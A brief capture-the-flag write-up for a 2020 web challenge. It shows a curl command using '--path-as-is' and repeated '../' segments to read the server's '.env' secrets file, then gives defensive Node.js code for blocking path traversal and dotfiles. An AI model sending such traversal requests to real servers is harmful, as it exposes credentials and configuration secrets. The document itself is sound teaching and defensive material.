Tags: path-traversal unintended web
Rating: 3.7
We noticed the application uses `dotenv` to store the flag, and we also found a path traversal vulnerability (unintended by the author).
`dotenv` fetches values from a file called `.env`, so we can get the flag by fetching this file!
```
curl --path-as-is https://cookie-recipes-v2.2020.redpwnc.tf/../../../../../../../app/.env
```
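Because `--path-as-is` stops curl from collapsing the `../` segments before sending, the server has to enforce containment itself. The sketch below is an added example, not the challenge's code: it contrasts a naive path join with a resolver that rejects anything outside the static root, plus dotfiles such as `.env`. The root `/app/public` and both function names are assumptions.

```javascript
// Added example (not from the challenge source): containment check for a static-file handler.
const path = require('node:path').posix;

// Hypothetical static root; the real application layout is not shown in the writeup.
const STATIC_ROOT = '/app/public';

// Vulnerable pattern: join the raw request path onto the root.
// path.join normalises "..", so the result can land outside STATIC_ROOT.
function resolveNaive(urlPath) {
  return path.join(STATIC_ROOT, urlPath);
}

// Hardened pattern: decode once, resolve to an absolute path, then verify it
// is still under STATIC_ROOT and touches no dotfile.
// Returns the path to serve, or null when the request must be rejected.
function resolveSafe(urlPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(urlPath);
  } catch {
    return null; // malformed percent-encoding
  }
  if (decoded.includes('\0')) return null; // NUL bytes never belong in a path

  // Prefixing "./" keeps a leading "/" from being treated as an absolute path.
  const resolved = path.resolve(STATIC_ROOT, './' + decoded);
  const inside =
    resolved === STATIC_ROOT || resolved.startsWith(STATIC_ROOT + '/');
  if (!inside) return null;

  // Refuse dotfiles and dot-directories (.env, .git, ...) even inside the root.
  const segments = path.relative(STATIC_ROOT, resolved).split('/');
  if (segments.some((s) => s.startsWith('.'))) return null;

  return resolved;
}

// Constructed sample input: the request path used in the writeup's curl command.
const probe = '/../../../../../../../app/.env';
console.log('naive:', resolveNaive(probe));
console.log('safe: ', resolveSafe(probe));
```

Serving only from a directory that contains no secrets, and keeping `.env` outside any web-reachable tree, limits the damage if a containment check is ever missed.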